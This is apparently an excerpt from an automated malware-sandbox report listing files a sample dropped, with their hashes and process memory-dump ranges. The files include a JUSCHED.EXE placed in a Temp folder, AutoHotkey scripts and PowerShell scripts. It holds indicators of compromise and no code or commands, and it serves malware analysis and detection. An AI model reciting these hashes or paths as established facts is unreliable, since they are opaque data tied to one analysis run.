1b701daded4124260a49040d83dec15c627b8e4a1a04dc378aae7fecfca3abf3

SHA512
7c94bafa48db045a864a778a010a7d1d03204828bd103a86c1267732a51260b0e689a799cc7e95410ceedd1254fb91aa3f19f62efa3e41e40be645862a4e07e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXE

Filesize
3.1MB

MD5
bd4dcbdfdb5fdc1f95bd1168f166153a

SHA1
9db60cf0f8a8b88d3c4601df25963536aaeb1884

SHA256
902bea9e4aeeed4e0b5d30a9cbcc6f9f1fc687b79c3fdde8258b94b410d1797a

SHA512
26ef32fe83a4e6c9c293910e96da431ba6b46b645969b9c56808d451875b0a3f4baad697362d7342f9d4822b84682b7705c2097839c796369503ffbfaa72aab2

Download Submit
C:\Users\Admin\AppData\Local\Temp\ZOMBIES.AHK

Filesize
6KB

MD5
4378ec2852917fed7f557291e72251a6

SHA1
104b3e944a713760b1fe491679ff3aa0af32298b

SHA256
2ba38af1ffa558f31af78ae94c3369d92366838d5cb1e5c01c58369bc92ac914

SHA512
162541d9cf8facddc824e65c0a9eb5760c95bf011ad69fdbd79890d9b44324b7e25cc3011ef2a9d0bdd351122148b8e5e9e627eb754f5383dd64bd35bd84db56

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b3qj3z2b.fhk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\shortcut.ps1

Filesize
2KB

MD5
0bd19f7c1c4e8b5ed89da56ae5f8adb0

SHA1
a2384a83aea7d7568fc8ebd280b7722b0efd6902

SHA256
62ec8d3ae53114ba6d6d2a41ee59dd4866e7cd8e2fcbd6793b0cc40bc85e622f

SHA512
dbd7268491aa5ec39e89f71febcdc18cb6c96bbba617a1734eef55711ed70c3bf78960e94e8595e9d3b618b9cfc2ab9ff4d8e0c73d97a0c77b504b36be573f53

Download Submit
C:\Users\Admin\AppData\Local\Temp\wmsetup.log

Filesize
1KB

MD5
ba6ea599227932b140ae3507eccd8e9b

SHA1
80e767b5307fbc941ed922918de8e8060bf9bd13

SHA256
ba00cb2a9e97ce207e251da15db4c4aa473f6b562984ea053daf42672dc23cd4

SHA512
2719c7829b20a42c8cec3fd942b4ac87e7f54639f644f29bbc8006328ed9ed74b96f791b9c7fc52a3a650867dd708a9fa3d13008dee2cea55c51efbd03318c73

Download Submit
C:\Users\Admin\Desktop\CritScript.ahk.lnk

Filesize
1KB

MD5
d64104d2b2f8190c9d3abb6807c5b12e

SHA1
110ff300872d17ad1f0cd56e71ac7f91288939ff

SHA256
3c5b140b44bc78d614dfc3debaa3078235010c1d716364101dd501c4cbce4690

SHA512
ee07f7554c2be856b2eabfea05e5d692ce69cf62fe06197d7281601595ab2523c7b0384fa0ffa1576bee3797aa253b048f9aff6cda47b2b95512b5e718473eef

Download Submit
\??\pipe\crashpad_3044_LJOUBOHLMDXUZIUD

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/2412-106-0x0000000000510000-0x0000000000834000-memory.dmp

Filesize
3.1MB

Download
memory/4012-114-0x000000001B830000-0x000000001B880000-memory.dmp

Filesize
320KB

Download
memory/4012-115-0x000000001BF60000-0x000000001C012000-memory.dmp

Filesize
712KB

Download
memory/4844-33-0x00007FF9FC980000-0x00007FF9FD442000-memory.dmp

Filesize
10.8MB

Download
memory/4844-31-0x00007FF9FC980000-0x00007FF9FD442000-memory.dmp

Filesize
10.8MB

Download
memory/4844-35-0x00007FF9FC980000-0x00007FF9FD442000-memory.dmp

Filesize
10.8MB

Download
memory/4844-36-0x00007FF9FC980000-0x00007FF9FD442000-memory.dmp

Filesize
10.8MB

Download
memory/5056-20-0x00007FF9FC980000-0x00007FF9FD442000-memory.dmp

Filesize
10.8MB

Download
memory/5056-15-0x00007FF9FC980000-0x00007FF9FD442000-memory.dmp

Filesize
10.8MB

Download
memory/5056-16-0x000001DF3D750000-0x000001DF3D766000-memory.dmp

Filesize
88KB

Download
memory/5056-14-0x00007FF9FC980000-0x00007FF9FD442000-memory.dmp

Filesize
10.8MB

Download
memory/5056-13-0x00007FF9FC980000-0x00007FF9FD442000-memory.dmp

Filesize
10.8MB

Download
memory/5056-12-0x000001DF3D840000-0x000001DF3D944000-memory.dmp

Filesize
1.0MB

Download
memory/5056-10-0x000001DF3D610000-0x000001DF3D620000-memory.dmp

Filesize
64KB

Download
memory/5056-11-0x000001DF3D620000-0x000001DF3D642000-memory.dmp

Filesize
136KB

Download
memory/5056-0-0x00007FF9FC983000-0x00007FF9FC985000-memory.dmp

Filesize
8KB

Download
memory/5056-1-0x000001DF3D660000-0x000001DF3D6E6000-memory.dmp

Filesize
536KB

Download